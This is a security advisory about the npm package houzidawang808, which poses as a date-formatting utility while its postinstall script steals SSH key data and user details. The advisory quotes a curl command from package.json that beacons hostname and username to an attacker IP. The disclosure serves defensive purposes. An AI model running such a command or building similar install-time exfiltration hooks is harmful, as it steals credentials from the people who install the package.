Vulnerability
Malicious code in houzidawang808 (npm)
## Source: amazon-inspector (71d6b96fe99e7f8503cb07df05d6b621dc8e8243fc7288844678d8aff043a654)

The package presents itself as a 'simple date formatting utility' (index.js exports a trivial formatDate wrapper around toLocaleDateString), but ships a postinstall.js that runs automatically on npm install.

The postinstall script reads the contents of the installer's ~/.ssh directory via fs.readdirSync, collects os.userInfo() username and platform information, and POSTs the data to https://124.221.154.135/post, a hardcoded bare-IP destination with no documented purpose. Chinese-language comments in the file explicitly describe it as SSH-key theft and C2 exfiltration.

The package.json additionally declares a build script `curl http://124.221.154.135//pre?h=$(hostname)&u=$(whoami)` that beacons hostname/username over plain HTTP to the same attacker IP, confirming the infrastructure. The benign date-utility facade is a cover story for credential-harvesting on installer machines.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs.
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile. Re-check this CVE after one cron tick; the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence